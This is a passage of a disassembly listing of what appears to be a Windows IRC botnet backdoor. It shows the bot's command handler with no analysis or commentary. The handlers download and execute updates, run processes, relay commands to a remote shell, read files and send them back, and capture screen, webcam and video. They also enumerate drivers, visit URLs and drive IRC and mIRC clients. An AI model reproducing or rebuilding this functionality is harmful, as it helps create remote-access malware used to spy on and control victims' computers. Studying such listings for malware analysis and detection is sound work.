call sub_416BCD
add esp, 10h
jmp loc_40EE2A
; ---------------------------------------------------------------------------
loc_40C92D: ; CODE XREF: sub_409848+24D2�j
; sub_409848+24E6�j
push [ebp+var_8]
lea eax, [ebp+var_13D0]
push 104h
push eax
call sub_416BCD
xor esi, esi
add esp, 0Ch
cmp [ebp+var_14], esi
jz short loc_40C96B
push [ebp+var_10]
push [ebp+var_14]
call sub_417440
cmp eax, esi
pop ecx
pop ecx
jz short loc_40C96B
push eax
lea eax, [ebp+var_12CC]
push eax
call sub_416975
pop ecx
pop ecx
loc_40C96B: ; CODE XREF: sub_409848+3101�j
; sub_409848+3112�j
push [ebp+var_9C]
lea eax, [ebp+var_1450]
push 80h
push eax
call sub_416BCD
mov eax, [ebp+arg_4]
mov [ebp+var_1454], eax
mov eax, [ebp+var_4]
mov [ebp+var_11C4], eax
mov eax, [ebp+var_C]
mov [ebp+var_11C0], eax
lea eax, [ebp+var_12CC]
push eax
lea eax, [ebp+var_13D0]
push eax
push offset aFindfileSear_0 ; "[FINDFILE]: Searching for file: %s in: "...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416BCD
push esi
lea eax, [ebp+var_2F0]
push 1Ch
push eax
call sub_413732
add esp, 2Ch
mov [ebp+var_11C8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1454]
push eax
push offset sub_403732
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_11C8]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40CA30
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aFindfileFailed ; "[FINDFILE]: Failed to start search thre"...
loc_40CA14: ; CODE XREF: sub_409848+4763�j
; sub_409848+54E7�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 0Ch
jmp loc_40EE4D
; ---------------------------------------------------------------------------
loc_40CA28: ; CODE XREF: sub_409848+31EE�j
push 32h
call dword_422000 ; Sleep
loc_40CA30: ; CODE XREF: sub_409848+31BE�j
cmp [ebp+var_11BC], esi
jz short loc_40CA28
jmp loc_40EE4D
; ---------------------------------------------------------------------------
loc_40CA3D: ; CODE XREF: sub_409848+24AA�j
; sub_409848+24BE�j
push 11h
pop ecx
push [ebp+var_8]
xor eax, eax
xor ebx, ebx
lea edi, [ebp+var_334]
rep stosd
inc ebx
xor esi, esi
mov [ebp+var_334], 44h
mov [ebp+var_308], ebx
mov word ptr [ebp+var_304], si
call sub_416D02
cmp eax, ebx
pop ecx
jnz short loc_40CA7C
mov word ptr [ebp+var_304], 5
loc_40CA7C: ; CODE XREF: sub_409848+3229�j
cmp [ebp+var_14], esi
jz loc_40D870
push [ebp+var_10]
push [ebp+var_14]
call sub_417440
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jz loc_40D870
lea eax, [ebp+var_750]
push eax
lea eax, [ebp+var_334]
push eax
push esi
push esi
push 30h
push ebx
push esi
push esi
push edi
push esi
call dword_422044 ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40CAD5
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
push eax
call sub_416975
pop ecx
pop ecx
jmp loc_40D870
; ---------------------------------------------------------------------------
loc_40CAD5: ; CODE XREF: sub_409848+3279�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40D867
; ---------------------------------------------------------------------------
loc_40CAE0: ; CODE XREF: sub_409848+2482�j
; sub_409848+2496�j
mov edi, [ebp+var_10]
mov esi, offset aBot013 ; "Bot013"
loc_40CAE8: ; CODE XREF: sub_409848+32BC�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_40CB0A
test al, al
jz short loc_40CB06
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_40CB0A
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40CAE8
loc_40CB06: ; CODE XREF: sub_409848+32AA�j
xor eax, eax
jmp short loc_40CB0F
; ---------------------------------------------------------------------------
loc_40CB0A: ; CODE XREF: sub_409848+32A6�j
; sub_409848+32B4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40CB0F: ; CODE XREF: sub_409848+32C0�j
test eax, eax
mov edi, [ebp+arg_4]
jz loc_40CC82
lea eax, [ebp+var_860]
push eax
push 104h
call dword_4220D0 ; GetTempPathA
push 0FFh
push [ebp+var_8]
lea eax, [ebp+var_E14]
push eax
call sub_416A00
lea eax, [ebp+var_75C]
push eax
call sub_410E56
push eax
lea eax, [ebp+var_860]
push eax
lea eax, [ebp+var_D14]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_416975
mov eax, [ebp+ebx+var_98]
xor esi, esi
add esp, 20h
cmp eax, esi
mov [ebp+var_B10], 1
mov [ebp+var_B0C], esi
jz short loc_40CB99
push 10h
push esi
push eax
call sub_417799
add esp, 0Ch
mov [ebp+var_B04], eax
jmp short loc_40CB9F
; ---------------------------------------------------------------------------
loc_40CB99: ; CODE XREF: sub_409848+333B�j
mov [ebp+var_B04], esi
loc_40CB9F: ; CODE XREF: sub_409848+334F�j
mov ebx, [ebp+ebx+var_94]
cmp ebx, esi
jz short loc_40CBB9
push ebx
call sub_416D02
pop ecx
mov [ebp+var_B08], eax
jmp short loc_40CBBF
; ---------------------------------------------------------------------------
loc_40CBB9: ; CODE XREF: sub_409848+3360�j
mov [ebp+var_B08], esi
loc_40CBBF: ; CODE XREF: sub_409848+336F�j
movzx eax, [ebp+var_38B]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_B00], eax
lea eax, [ebp+var_E94]
push eax
mov [ebp+var_E98], edi
call sub_416A00
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_AF8], eax
mov eax, [ebp+var_C]
mov [ebp+var_AFC], eax
lea eax, [ebp+var_2F0]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_416975
push edi
lea eax, [ebp+var_2F0]
push 17h
push eax
call sub_413732
add esp, 24h
mov [ebp+var_B14], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_E98]
push eax
push offset sub_402C71
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_B14]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40CC78
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
push eax
call sub_416975
add esp, 0Ch
jmp short loc_40CC84
; ---------------------------------------------------------------------------
loc_40CC70: ; CODE XREF: sub_409848+3436�j
push 32h
call dword_422000 ; Sleep
loc_40CC78: ; CODE XREF: sub_409848+3409�j
cmp [ebp+var_AF4], esi
jz short loc_40CC70
jmp short loc_40CC84
; ---------------------------------------------------------------------------
loc_40CC82: ; CODE XREF: sub_409848+32CC�j
xor esi, esi
loc_40CC84: ; CODE XREF: sub_409848+3426�j
; sub_409848+3438�j
cmp [ebp+var_C], esi
jnz loc_40AF34
push esi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40AF2C
; ---------------------------------------------------------------------------
loc_40CCA4: ; CODE XREF: sub_409848+245A�j
; sub_409848+246E�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E0
pop ecx
xor eax, eax
repe cmpsb
jz loc_409AC6
cmp [ebp+var_14], eax
jz loc_409AC6
push [ebp+var_10]
push [ebp+var_14]
call sub_417440
push eax
push [ebp+var_9C]
lea eax, [ebp+var_2F0]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416975
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_416A00
push [ebp+var_8]
call sub_416D02
add esp, 30h
test eax, eax
jle short loc_40CD2D
push [ebp+var_8]
call sub_416D02
imul eax, 3E8h
pop ecx
push eax
call dword_422000 ; Sleep
loc_40CD2D: ; CODE XREF: sub_409848+34CD�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_401F0F
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_409AC9
; ---------------------------------------------------------------------------
loc_40CD41: ; CODE XREF: sub_409848+2432�j
; sub_409848+2446�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E0
pop ecx
xor eax, eax
repe cmpsb
jz loc_409AC6
cmp [ebp+var_14], eax
jz loc_40F93F
mov esi, [ebp+var_10]
push esi
push [ebp+var_14]
call sub_417440
pop ecx
pop ecx
mov ebx, eax
push 7
inc esi
pop ecx
xor eax, eax
mov edi, offset aRepeat ; "repeat"
repe cmpsb
lea eax, [ebp+var_2F0]
push ebx
jz short loc_40CDFB
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416975
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_416A00
push ebx
lea eax, [ebp+var_2F0]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_416975
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
push [ebp+var_8]
call sub_416D02
add esp, 38h
test eax, eax
jle loc_40F93F
push [ebp+var_8]
call sub_416D02
add eax, [ebp+arg_24]
pop ecx
jmp loc_409AC9
; ---------------------------------------------------------------------------
loc_40CDFB: ; CODE XREF: sub_409848+353E�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40D4F6
; ---------------------------------------------------------------------------
loc_40CE05: ; CODE XREF: sub_409848+240A�j
; sub_409848+241E�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_416975
push [ebp+var_8]
call sub_416D02
add esp, 10h
loc_40CE24: ; CODE XREF: sub_409848+3649�j
test eax, eax
jle loc_40F93F
push [ebp+var_8]
call sub_416D02
cmp eax, 1F4h
pop ecx
jge loc_40F93F
loc_40CE40: ; CODE XREF: sub_409848+4190�j
lea eax, [ebp+var_2F0]
push eax
push offset aS_4 ; "%s\r\n"
push [ebp+var_8]
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call sub_405D17
jmp loc_40EAD9
; ---------------------------------------------------------------------------
loc_40CE6B: ; CODE XREF: sub_409848+23E2�j
; sub_409848+23F6�j
push [ebp+ebx+var_98]
lea eax, [ebp+var_2F0]
push [ebp+var_10]
push offset aJoinSS ; "JOIN %s %s"
push eax
call sub_416975
push [ebp+var_8]
call sub_416D02
add esp, 14h
jmp short loc_40CE24
; ---------------------------------------------------------------------------
loc_40CE93: ; CODE XREF: sub_409848+23BA�j
; sub_409848+23CE�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_416975
mov esi, [ebp+var_8]
push esi
call sub_416D02
add esp, 10h
test eax, eax
jle loc_40F93F
push esi
call sub_416D02
cmp eax, 1F4h
pop ecx
jge loc_40F93F
lea eax, [ebp+var_2F0]
push eax
push offset aS_4 ; "%s\r\n"
push esi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call sub_405D17
push [ebp+var_10]
push esi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40CEFA: ; CODE XREF: sub_409848+373D�j
; sub_409848+37AC�j ...
call sub_401F83
jmp loc_40E7AA
; ---------------------------------------------------------------------------
loc_40CF04: ; CODE XREF: sub_409848+2392�j
; sub_409848+23A6�j
cmp [ebp+var_14], 0
jz loc_40F93F
push [ebp+var_10]
push [ebp+var_14]
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40CF36
push esi
lea eax, [ebp+var_2F0]
push offset aModeS ; "MODE %s"
push eax
call sub_416975
add esp, 0Ch
loc_40CF36: ; CODE XREF: sub_409848+36D7�j
mov edi, [ebp+var_8]
push edi
call sub_416D02
test eax, eax
pop ecx
jle loc_40F93F
push edi
call sub_416D02
cmp eax, 1F4h
pop ecx
jge loc_40F93F
lea eax, [ebp+var_2F0]
push eax
push offset aS_4 ; "%s\r\n"
push edi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call sub_405D17
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40CEFA
; ---------------------------------------------------------------------------
loc_40CF8A: ; CODE XREF: sub_409848+236A�j
; sub_409848+237E�j
cmp [ebp+var_14], 0
jz loc_40F93F
push [ebp+var_10]
push [ebp+var_14]
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F93F
mov edi, [ebp+var_8]
push edi
call sub_416D02
test eax, eax
pop ecx
jle loc_40F93F
push edi
call sub_416D02
cmp eax, 1F4h
pop ecx
jge loc_40F93F
push esi
push offset aS_4 ; "%s\r\n"
push edi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call sub_405D17
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40CEFA
; ---------------------------------------------------------------------------
loc_40CFF9: ; CODE XREF: sub_409848+2342�j
; sub_409848+2356�j
cmp [ebp+var_14], 0
jz loc_40F93F
push [ebp+var_8]
push [ebp+var_14]
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F93F
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_405D17
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
jmp loc_40DBD2
; ---------------------------------------------------------------------------
loc_40D033: ; CODE XREF: sub_409848+231A�j
; sub_409848+232E�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E0
pop ecx
xor eax, eax
repe cmpsb
jz loc_409AC6
push [ebp+var_10]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_405D17
push [ebp+var_8]
call sub_416D02
imul eax, 3E8h
add esp, 10h
push eax
call dword_422000 ; Sleep
push [ebp+ebx+var_98]
push [ebp+var_10]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405D17
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_401F0F
jmp loc_40DBD7
; ---------------------------------------------------------------------------
loc_40D099: ; CODE XREF: sub_409848+22F2�j
; sub_409848+2306�j
cmp [ebp+var_14], 0
jz loc_40F93F
lea edx, [eax+1]
loc_40D0A6: ; CODE XREF: sub_409848+3863�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40D0A6
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40D0B7: ; CODE XREF: sub_409848+3874�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40D0B7
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F93F
push esi
lea eax, [ebp+var_2F0]
push offset dword_429D4C
push eax
call sub_416975
push 0
push 0
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_8]
push [ebp+arg_4]
call sub_405D62
push esi
push [ebp+var_8]
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_401F83
add esp, 2Ch
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40D11C: ; CODE XREF: sub_409848+22CA�j
; sub_409848+22DE�j
cmp [ebp+var_14], 0
jz loc_40F93F
lea edx, [eax+1]
loc_40D129: ; CODE XREF: sub_409848+38E6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40D129
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40D13A: ; CODE XREF: sub_409848+38F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40D13A
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F93F
push 0
push 0
push esi
push [ebp+var_8]
push [ebp+arg_4]
call sub_405D62
push esi
push [ebp+var_8]
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_401F83
loc_40D17F: ; CODE XREF: sub_409848+5CB9�j
add esp, 20h
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40D187: ; CODE XREF: sub_409848+22A2�j
; sub_409848+22B6�j
cmp [ebp+var_14], 0
jz loc_409AC6
push [ebp+var_10]
push [ebp+var_14]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz loc_409AC6
push eax
push [ebp+var_8]
call sub_401DFF
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_416975
add esp, 14h
loc_40D1C6: ; CODE XREF: sub_409848+427B�j
; sub_409848+56A5�j
cmp [ebp+var_C], 0
jnz short loc_40D1E9
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40D1E9: ; CODE XREF: sub_409848+3982�j
; sub_409848+4E6C�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
jmp loc_40FAFE
; ---------------------------------------------------------------------------
loc_40D1FA: ; CODE XREF: sub_409848+2162�j
; sub_409848+2176�j
push [ebp+var_8]
push [ebp+arg_1C]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz loc_40F93F
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40D295
push ebx
push [ebp+var_14]
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
lea eax, [ebp+var_2F0]
jz short loc_40D283
push esi
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416975
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_416A00
push esi
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_416975
add esp, 34h
inc [ebp+arg_24]
jmp loc_40D66C
; ---------------------------------------------------------------------------
loc_40D283: ; CODE XREF: sub_409848+39E7�j
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_416975
pop ecx
pop ecx
jmp loc_40D66C
; ---------------------------------------------------------------------------
loc_40D295: ; CODE XREF: sub_409848+39D0�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_412DD1
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
push 200h
push eax
call sub_416BCD
add esp, 24h
jmp loc_40D66C
; ---------------------------------------------------------------------------
loc_40D2DF: ; CODE XREF: sub_409848+213A�j
; sub_409848+214E�j
mov esi, [ebp+var_8]
push 7
mov edi, offset aScreen ; "screen"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40D338
mov esi, [ebp+ebx+var_9C]
test esi, esi
jz short loc_40D325
push esi
call sub_4021C5
cmp eax, 1
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40D31E
push esi
push offset aCaptureScreenC ; "[CAPTURE]: Screen capture saved to: %s."...
push eax
call sub_416975
add esp, 0Ch
jmp short loc_40D338
; ---------------------------------------------------------------------------
loc_40D31E: ; CODE XREF: sub_409848+3AC3�j
push offset aCaptureErrorWh ; "[CAPTURE]: Error while capturing screen"...
jmp short loc_40D330
; ---------------------------------------------------------------------------
loc_40D325: ; CODE XREF: sub_409848+3AB1�j
push offset aCaptureNoFilen ; "[CAPTURE]: No filename specified for sc"...
lea eax, [ebp+var_2F0]
loc_40D330: ; CODE XREF: sub_409848+3ADB�j
push eax
call sub_416975
pop ecx
pop ecx
loc_40D338: ; CODE XREF: sub_409848+3AA6�j
; sub_409848+3AD4�j
mov esi, [ebp+var_8]
push 8
mov edi, offset aDrivers ; "drivers"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40D3C5
xor edi, edi
mov esi, 0FFh
loc_40D350: ; CODE XREF: sub_409848+3B68�j
push 1FFh
lea eax, [ebp+var_AF0]
push eax
push esi
lea eax, [ebp+var_155C]
push eax
push edi
call dword_43A454
test eax, eax
jz short loc_40D3AC
lea eax, [ebp+var_AF0]
push eax
lea eax, [ebp+var_155C]
push eax
push edi
lea eax, [ebp+var_EF0]
push offset aCaptureDriverD ; "[CAPTURE]: Driver #%d - %s - %s."
push eax
call sub_416975
push 0
push [ebp+var_4]
lea eax, [ebp+var_EF0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 28h
loc_40D3AC: ; CODE XREF: sub_409848+3B25�j
inc edi
cmp edi, 0Ah
jl short loc_40D350
lea eax, [ebp+var_2F0]
push offset aCaptureDriverL ; "[CAPTURE]: Driver list complete."
push eax
call sub_416975
pop ecx
pop ecx
loc_40D3C5: ; CODE XREF: sub_409848+3AFF�j
mov esi, [ebp+var_8]
push 6
mov edi, offset aFrame ; "frame"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40D461
cmp [ebp+ebx+var_9C], eax
jz short loc_40D44E
mov edi, [ebp+ebx+var_98]
test edi, edi
jz short loc_40D44E
mov esi, [ebp+ebx+var_94]
test esi, esi
jz short loc_40D44E
mov eax, [ebp+ebx+var_90]
test eax, eax
jz short loc_40D44E
push eax
call sub_416D02
pop ecx
push eax
push esi
call sub_416D02
pop ecx
push eax
push edi
call sub_416D02
mov esi, [ebp+ebx+var_9C]
pop ecx
push eax
push esi
call sub_402402
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40D447
push esi
push offset aCaptureWebcamC ; "[CAPTURE]: Webcam capture saved to: %s."...
push eax
call sub_416975
add esp, 0Ch
jmp short loc_40D461
; ---------------------------------------------------------------------------
loc_40D447: ; CODE XREF: sub_409848+3BEC�j
push offset aCaptureError_0 ; "[CAPTURE]: Error while capturing from w"...
jmp short loc_40D459
; ---------------------------------------------------------------------------
loc_40D44E: ; CODE XREF: sub_409848+3B99�j
; sub_409848+3BA4�j ...
push offset aCaptureInvalid ; "[CAPTURE]: Invalid parameters for webca"...
lea eax, [ebp+var_2F0]
loc_40D459: ; CODE XREF: sub_409848+3C04�j
push eax
call sub_416975
pop ecx
pop ecx
loc_40D461: ; CODE XREF: sub_409848+3B8C�j
; sub_409848+3BFD�j
mov esi, [ebp+var_8]
push 6
mov edi, offset aVideo ; "video"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40D649
mov eax, [ebp+ebx+var_9C]
test eax, eax
mov [ebp+var_10], eax
jz loc_40D50E
mov eax, [ebp+ebx+var_98]
test eax, eax
mov [ebp+arg_0], eax
jz short loc_40D50E
mov edi, [ebp+ebx+var_94]
test edi, edi
jz short loc_40D50E
mov esi, [ebp+ebx+var_90]
test esi, esi
jz short loc_40D50E
mov ebx, [ebp+ebx+var_8C]
test ebx, ebx
jz short loc_40D50E
push ebx
call sub_416D02
pop ecx
push eax
push esi
call sub_416D02
pop ecx
push eax
push edi
call sub_416D02
pop ecx
push eax
push [ebp+arg_0]
call sub_416D02
pop ecx
push eax
push [ebp+var_10]
call sub_4025FE
add esp, 14h
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40D504
push [ebp+var_10]
push offset aCaptureAmateur ; "[CAPTURE]: Amateur video saved to: %s."
loc_40D4F6: ; CODE XREF: sub_409848+35B8�j
push eax
call sub_416975
add esp, 0Ch
jmp loc_40D649
; ---------------------------------------------------------------------------
loc_40D504: ; CODE XREF: sub_409848+3CA4�j
push offset aCaptureError_1 ; "[CAPTURE]: Error while capturing amateu"...
jmp loc_40D641
; ---------------------------------------------------------------------------
loc_40D50E: ; CODE XREF: sub_409848+3C3A�j
; sub_409848+3C4C�j ...
push offset aCaptureInval_0 ; "[CAPTURE]: Invalid parameters for amate"...
lea eax, [ebp+var_2F0]
jmp loc_40D641
; ---------------------------------------------------------------------------
loc_40D51E: ; CODE XREF: sub_409848+1B83�j
; sub_409848+1B97�j
push offset aR ; "r"
push [ebp+var_8]
call sub_41720C
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_40D59C
push edi
mov esi, 200h
lea eax, [ebp+var_2F0]
push esi
push eax
call sub_4181E7
add esp, 0Ch
jmp short loc_40D576
; ---------------------------------------------------------------------------
loc_40D54B: ; CODE XREF: sub_409848+3D30�j
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
push edi
lea eax, [ebp+var_2F0]
push esi
push eax
call sub_4181E7
add esp, 20h
loc_40D576: ; CODE XREF: sub_409848+3D01�j
test eax, eax
jnz short loc_40D54B
push edi
call sub_416E7D
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_416975
add esp, 10h
jmp loc_40AF34
; ---------------------------------------------------------------------------
loc_40D59C: ; CODE XREF: sub_409848+3CE9�j
push [ebp+var_8]
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
jmp loc_40ED53
; ---------------------------------------------------------------------------
loc_40D5A9: ; CODE XREF: sub_409848+1B5B�j
; sub_409848+1B6F�j
cmp [ebp+var_14], 0
jz loc_40F93F
push [ebp+var_8]
push [ebp+var_14]
call sub_417440
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40F93F
mov edi, ebx
dec edi
loc_40D5CD: ; CODE XREF: sub_409848+3D8B�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40D5CD
mov esi, offset asc_4236F0 ; "\n"
push ebx
movsw
call sub_4104D0
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40D5F4
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp short loc_40D641
; ---------------------------------------------------------------------------
loc_40D5F4: ; CODE XREF: sub_409848+3DA3�j
push ebx
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
push eax
call sub_416975
add esp, 0Ch
jmp short loc_40D66C
; ---------------------------------------------------------------------------
loc_40D605: ; CODE XREF: sub_409848+1B33�j
; sub_409848+1B47�j
cmp [ebp+var_14], 0
jz loc_40F93F
push [ebp+var_8]
push [ebp+var_14]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz loc_40F93F
push eax
call sub_40742E
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40D63C
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp short loc_40D641
; ---------------------------------------------------------------------------
loc_40D63C: ; CODE XREF: sub_409848+3DEB�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
loc_40D641: ; CODE XREF: sub_409848+3CC1�j
; sub_409848+3CD1�j ...
push eax
call sub_416975
pop ecx
pop ecx
loc_40D649: ; CODE XREF: sub_409848+3C28�j
; sub_409848+3CB7�j
cmp [ebp+var_C], 0
jnz short loc_40D66C
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40D66C: ; CODE XREF: sub_409848+3A36�j
; sub_409848+3A48�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
pop ecx
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40D67E: ; CODE XREF: sub_409848+1B0B�j
; sub_409848+1B1F�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_1854]
push eax
call sub_416A00
mov ebx, [ebp+ebx+var_9C]
xor esi, esi
add esp, 0Ch
cmp ebx, esi
jz short loc_40D6B1
push 7Fh
lea eax, [ebp+var_17D4]
push ebx
push eax
call sub_416A00
add esp, 0Ch
loc_40D6B1: ; CODE XREF: sub_409848+3E55�j
push 7Fh
push [ebp+var_9C]
lea eax, [ebp+var_1754]
push eax
call sub_416A00
mov eax, [ebp+arg_4]
push [ebp+var_8]
mov [ebp+var_1858], eax
mov eax, [ebp+var_C]
mov [ebp+var_16D0], eax
mov eax, [ebp+var_4]
mov [ebp+var_16CC], eax
lea eax, [ebp+var_2F0]
push offset aVisitUrlS_ ; "[VISIT]: URL: %s."
push eax
call sub_416975
push esi
lea eax, [ebp+var_2F0]
push 15h
push eax
call sub_413732
add esp, 24h
mov [ebp+var_16D4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1858]
push eax
push offset sub_413A7D
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_16D4]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40D763
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aVisitFailedToS ; "[VISIT]: Failed to start connection thr"...
loc_40D747: ; CODE XREF: sub_409848+5162�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 0Ch
jmp loc_40AF34
; ---------------------------------------------------------------------------
loc_40D75B: ; CODE XREF: sub_409848+3F21�j
push 32h
call dword_422000 ; Sleep
loc_40D763: ; CODE XREF: sub_409848+3EF1�j
cmp [ebp+var_16C8], esi
jz short loc_40D75B
jmp loc_40AF34
; ---------------------------------------------------------------------------
loc_40D770: ; CODE XREF: sub_409848+1AE3�j
; sub_409848+1AF7�j
push 0
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+var_8]
call sub_404849
push [ebp+var_8]
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40CEFA
; ---------------------------------------------------------------------------
